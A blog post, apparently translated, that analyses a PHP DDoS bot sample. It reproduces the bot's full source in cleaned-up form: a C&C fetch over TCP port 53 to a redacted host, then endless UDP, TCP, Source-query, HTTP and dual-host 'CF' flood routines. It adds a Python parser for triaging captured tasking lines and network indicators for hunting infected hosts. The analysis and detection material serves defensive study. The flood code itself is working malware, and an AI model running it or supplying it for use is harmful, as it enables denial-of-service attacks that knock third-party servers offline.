PHP DDoS also plays with C&C


The C&C (command-and-control) idea was applied to trojans very early, in things like Gray Pigeon (灰鸽子), and as new techniques appeared later, C&C-controlled trojans became ever more flexible to operate.
A few days ago I found a PHP DDoS sample on a foreign server that uses a similar idea: there is effectively a task server, and the phpddos script simply fetches its tasks from it and carries them out.
The original code was written badly, probably pieced together from whatever material the author could look up, so I did a simple cleanup of it.

<?php
set_time_limit(0);
ignore_user_abort(true);
function genstring($length, $letters = '1234567890QWERTYUIOPASDFGHJKLZXCVBNM'){
    $s = '';
    $lettersLength = strlen($letters)-1;
    for($i = 0 ; $i < $length ; $i++)
    {
        $s .= $letters[rand(0,$lettersLength)];
    }
    return $s;
}
$fp = fsockopen("xxx.xxx.xxx.xxx",53,$errno,$errstr,30);
if (!$fp) {
    echo "$errstr ($errno)<br />\n";
    exit;
}
$result=array();
$i=0;
while (!feof($fp)) {
    $command =  fgets($fp, 128);
    $result[]=$command;
}
fclose($fp);
while(1){
    foreach($result as $v){
        if(!$v){
            continue;
        }
        switch ($v){
            case stristr($v,'dup'):
                exit;
                break;
            case stristr($v,'LOLNOGTFO'):
                exit;
                break;
            case strstr($v,'UDP'):
                udp($v);
                break;
            case strstr($v,'TCP'):
                tcp($v);
                break;
            case strstr($v,'SOURCE'):
                source($v);
                break;
            case strstr($v,'HTTP'):
                http($v);
                break;
            case strstr($v,'CF'):
                cf($v);
                break;
        }
    }
}
//udp flood
function udp($command){
    $commands = explode(" ",$command);
    $ip = $commands[2];
    $time = $commands[4];
    $port = $commands[3];
    $packetsize = $commands[6];
    $envtime = time();
    $max_time = $envtime+$time;
    $packetsend = genstring($packetsize);
    $fp2 = fsockopen("udp://" . $ip, $port, $errno, $errstr);
    while(1){
        if (!$fp2) {
        } else {
            fwrite($fp2, $packetsend);
        }
        if(time() > $max_time)
        {
            fclose($fp2);
            break ;
        }
    }
}
//tcp flood
function tcp($command){
    $commands = explode(" ",$command);
    $ip = $commands[2];
    $time = $commands[4];
    $port = $commands[3];
    $packetsize = $commands[6];
    $envtime = time();
    $max_time = $envtime+$time;
    $packetsend = genstring($packetsize);
    $fp2 = fsockopen("tcp://" . $ip, $port, $errno, $errstr);
    while(1){
        if (!$fp2) {
        } else {
            fwrite($fp2, $packetsend);
        }
        if(time() > $max_time)
        {
            fclose($fp2);
            break;
        }
    }
}
//source
function source($command){
    $commands = explode(" ",$command);
    $ip = $commands[2];
    $time = $commands[4];
    $port = $commands[3];
    $packetsize = $commands[6];
    $envtime = time();
    $max_time = $envtime+$time;
    $fp2 = fsockopen("udp://" . $ip, $port, $errno, $errstr);
    $packetsend = genstring($packetsize);
    while(1){
        if (!$fp2) {
        } else {
            fwrite($fp2, "\xFF\xFF\xFF\xFF\x54");
            fwrite($fp2, "\xFF\xFF\xFF\xFF\x55");
            fwrite($fp2, "\xFF\xFF\xFF\xFF\x56");
        }
        if(time() > $max_time)
        {
            fclose($fp2);
            break;
        }
    }
}
//http
function http($command){
    $commands = explode(" ",$command);
    $ip = $commands[2];
    $time = $commands[6];
    $port = $commands[5];
    $website = $commands[3];
    $page = $commands[4];
    $envtime = time();
    $max_time = $envtime+$time;
    $fp2 = fsockopen("tcp://" . $ip, $port, $errno, $errstr);
    while(1){
        if (!$fp2) {
        } else {
            $out = "GET ". $page . "?" . rand(1,50000000)." HTTP/1.1\r\n";
            $out .= "Host: " . $website ."\r\n";
            fwrite($fp2, $out);
        }
        if(time() > $max_time)
        {
            fclose($fp2);
            break;
        }
    }
}
//cf
function cf($command){
    $commands = explode(" ",$command);
    $ip = $commands[2];
    $ip2 = $commands[3];
    $time = $commands[7];
    $port = $commands[6];
    $website = $commands[4];
    $page = $commands[5];
    $envtime = time();
    $max_time = $envtime+$time;
    $fp2 = fsockopen("tcp://" . $ip, $port, $errno, $errstr);
    $fp3 = fsockopen("tcp://" . $ip2, $port, $errno, $errstr);
    while(1){
        if (!$fp2) {
        } else {
            $out = "GET ". $page . "?" . rand(1,50000000)." HTTP/1.1\r\n";
            $out .= "Host: " . $website ."\r\n";
            fwrite($fp2, $out);
            fwrite($fp3, $out);
        }
        if(time() > $max_time)
        {
            fclose($fp2);
            fclose($fp3);
            break;
        }
    }
}
?>
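The following is an added example, not the sample's code and not part of the original post: a small Python triage parser for the bot's tasking lines, the kind of thing an incident responder wants when a captured C&C session (or the task list recovered from a compromised web server) has to be turned into a list of targets. The field positions are taken directly from the explode(" ") indexes each handler above reads (for example slot 2 is the IP and slot 4 the duration for UDP/TCP/SOURCE, while HTTP shifts the port to slot 5 and the duration to slot 6). Everything else is constructed: the sample lines, the filler words "flood" and "size" in slots the bot never reads, and the 203.0.113.0/24 addresses. The parser also mirrors the control loop of the sample: the bot reads the whole task list until the C&C closes the connection, then replays it in an endless while(1), so only a kill line (the sample's stristr matches for "dup" and "LOLNOGTFO", both case-insensitive) ever stops it and any task after that line never runs.

```python
"""Triage parser for the tasking lines of the PHP DDoS bot shown above.
Added example: field positions mirror the sample's explode(" ") indexes;
the session data and 203.0.113.0/24 addresses below are constructed."""
import ipaddress
from dataclasses import dataclass, field

# Slot index each handler reads out of explode(" ", $command).
# Slots not listed here are never looked at by the bot.
LAYOUTS = {
    "UDP":    {"ip": 2, "port": 3, "seconds": 4, "packet_size": 6},
    "TCP":    {"ip": 2, "port": 3, "seconds": 4, "packet_size": 6},
    "SOURCE": {"ip": 2, "port": 3, "seconds": 4, "packet_size": 6},
    "HTTP":   {"ip": 2, "host": 3, "page": 4, "port": 5, "seconds": 6},
    "CF":     {"ip": 2, "ip2": 3, "host": 4, "page": 5, "port": 6, "seconds": 7},
}


@dataclass
class Task:
    kind: str                 # "KILL" or one of the LAYOUTS keys
    fields: dict
    problems: list = field(default_factory=list)


def classify(line):
    """Mirror the sample's switch/case. PHP's loose == between $v and
    strstr($v, kw) only holds when the line starts with the keyword, so the
    dispatch is a prefix match; the two kill cases use stristr and are
    therefore case-insensitive, the flood keywords (strstr) are not."""
    v = line.rstrip("\r\n")
    if not v:
        return None                        # if(!$v) continue;
    if v.lower().startswith(("dup", "lolnogtfo")):
        return "KILL"                      # both branches call exit()
    for kind in LAYOUTS:
        if v.startswith(kind):
            return kind
    return None                            # no case matched: line is ignored


def parse_task(line):
    """Split exactly like explode(" "): runs of spaces yield empty slots."""
    kind = classify(line)
    if kind is None:
        return None
    if kind == "KILL":
        return Task("KILL", {})
    parts = line.rstrip("\r\n").split(" ")
    task = Task(kind, {})
    for name, idx in LAYOUTS[kind].items():
        if idx >= len(parts):
            task.problems.append(f"{name}: slot {idx} missing")
            continue
        task.fields[name] = parts[idx]
    # Plausibility checks before an analyst trusts the record.
    for key in ("ip", "ip2"):
        if key in task.fields:
            try:
                ipaddress.ip_address(task.fields[key])
            except ValueError:
                task.problems.append(f"{key}: not an IP address: {task.fields[key]!r}")
    for key in ("port", "seconds", "packet_size"):
        if key in task.fields and not task.fields[key].isdigit():
            task.problems.append(f"{key}: not numeric: {task.fields[key]!r}")
    return task


def summarize_session(lines):
    """Replay the bot's control loop over a captured task list. Returns the
    (kind, ip, port) targets that would actually be flooded, the parse
    problems, and whether a kill line is present; without one the sample's
    while(1) replays the same tasks forever."""
    targets, problems, terminates = [], [], False
    for line in lines:
        task = parse_task(line)
        if task is None:
            continue
        if task.kind == "KILL":
            terminates = True
            break                          # exit(): later lines never run
        problems.extend(f"{task.kind}: {p}" for p in task.problems)
        port = task.fields.get("port")
        for key in ("ip", "ip2"):          # CF floods two hosts at once
            if key in task.fields:
                targets.append((task.kind, task.fields[key], port))
    return {"targets": targets, "problems": problems, "terminates": terminates}


# Constructed session; "flood"/"size" are filler for slots the bot never reads.
SAMPLE_SESSION = [
    "UDP flood 203.0.113.10 80 60 size 1024\n",
    "HTTP flood 203.0.113.20 www.example.com /index.php 80 120\n",
    "CF flood 203.0.113.30 203.0.113.31 www.example.net / 443 30\n",
    "\n",
    "TCP flood not-an-ip 22 10 size 512\n",
    "LOLNOGTFO\n",
    "UDP flood 203.0.113.99 53 9999 size 64\n",   # after the kill: never run
]

if __name__ == "__main__":
    summary = summarize_session(SAMPLE_SESSION)
    for t in summary["targets"]:
        print("target:", *t)
    for p in summary["problems"]:
        print("problem:", p)
    print("bot terminates:", summary["terminates"])
```

Two things about the sample are worth keeping in mind when hunting for it on a web server: the bot's own C&C connection is a plain TCP session to port 53 that it reads until EOF, so an outbound, long-lived TCP/53 connection from a PHP process that carries newline-delimited text rather than DNS is a good network indicator, and because the task list is replayed forever, an infected host keeps flooding the same targets even after the C&C is taken down, so the file has to be removed rather than just the C&C blocked.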

Because of XXXX, the code of the server-side control end is not posted here, to avoid any suspicion of distributing hacking tools.
